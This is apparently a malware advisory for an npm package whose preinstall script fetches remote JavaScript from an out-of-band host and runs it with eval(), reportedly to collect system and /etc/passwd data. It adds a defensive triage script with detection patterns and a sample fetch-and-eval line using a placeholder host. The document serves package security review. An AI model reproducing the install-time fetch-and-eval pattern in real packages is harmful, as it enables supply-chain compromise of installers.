npm

@pulse-web-platform-core/scripts-loader @99.99.7

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-4421

Ecosystem

npm

Summary

On npm install, the package's preinstall.js performs an HTTP GET to http://${pkg}.${scope}.oob.moika.tech/poc.js and passes the response body directly to eval() with no integrity verification. The URL embeds the installing package's scope and name as DNS subdomains of oob.moika.tech, causing the installer's resolver and the remote server to receive the target's scope/package context as an out-of-band beacon before any code runs. The fetched payload then executes with the installer's privileges; an in-source comment indicates intent to collect whoami, hostname, ifconfig, and /etc/passwd output. The package metadata (keywords: ["bug bounty"], version 99.99.7, generic description k2 cloud utilities, scope @pulse-web-platform-core) is consistent with a dependency-confusion probe targeting an internal scope, but the install-time behavior is indistinguishable from a malicious supply-chain attack: every installer who pulls this package — whether deliberately or via name-confusion — executes attacker-controlled remote code over unauthenticated HTTP.

Source: amazon-inspector (7c69fc52eb76aa05711ea0c128624eb1fc8c70655a58f2f3e646da1dcd20f254)
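
The behaviors in the summary (an install hook, a cleartext fetch whose host is built by interpolation, eval() of the response, and a very high version number) can be checked for statically before a package is ever installed. The following is an added example, not code from the advisory, the package, or amazon-inspector. The names triagePackage and verdict, the rule ids, the sample package name and the .invalid host are assumptions made for illustration, and the rules flag co-occurrence of patterns rather than tracing data flow.

```javascript
// Added example: heuristic static triage of an npm package's install hooks.
const HOOKS = ["preinstall", "install", "postinstall"];
const SCRIPT_RULES = [
  ["dynamic-eval", /\beval\s*\(|\bnew\s+Function\s*\(/],
  ["cleartext-http", /\bhttp:\/\//],
  ["interpolated-host", /https?:\/\/[^\/\s'"`]*\$\{/],
];

function triagePackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push(`install-hook:${hook}`);
    // Inspect the hook command plus any local script it runs via `node <file>`.
    const sources = [cmd];
    const m = /\bnode\s+(?:\.\/)?([\w./-]+\.c?js)\b/.exec(cmd);
    if (m && files[m[1]] !== undefined) sources.push(files[m[1]]);
    for (const [id, re] of SCRIPT_RULES) {
      if (sources.some((src) => re.test(src))) findings.push(`${hook}:${id}`);
    }
  }
  // A very high major version is a dependency-confusion hint (the advisory cites 99.99.7).
  const major = parseInt(String(manifest.version || "0").split(".")[0], 10);
  if (major >= 99) findings.push("metadata:high-major-version");
  return findings;
}

// Block when an install hook both evaluates dynamic code and reaches out over HTTP.
function verdict(findings) {
  const has = (s) => findings.some((f) => f.endsWith(s));
  if (has(":dynamic-eval") && (has(":cleartext-http") || has(":interpolated-host"))) return "block";
  return findings.some((f) => f.startsWith("install-hook:")) ? "review" : "allow";
}

// Constructed sample modeled on the summary's description; not the real package contents.
const sampleManifest = {
  name: "@example-scope/example-loader", version: "99.99.7",
  scripts: { preinstall: "node preinstall.js" },
};
const sampleFiles = {
  "preinstall.js": "http.get(`http://${pkg}.${scope}.collector.example.invalid/poc.js`, (res) => { /* ... */ eval(body); });",
};
console.log(triagePackage(sampleManifest, sampleFiles), verdict(triagePackage(sampleManifest, sampleFiles)));
```

Run it against the manifest and script text extracted from a tarball (for example after npm pack, without installing), and treat "review" as a prompt to read the hook by hand.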
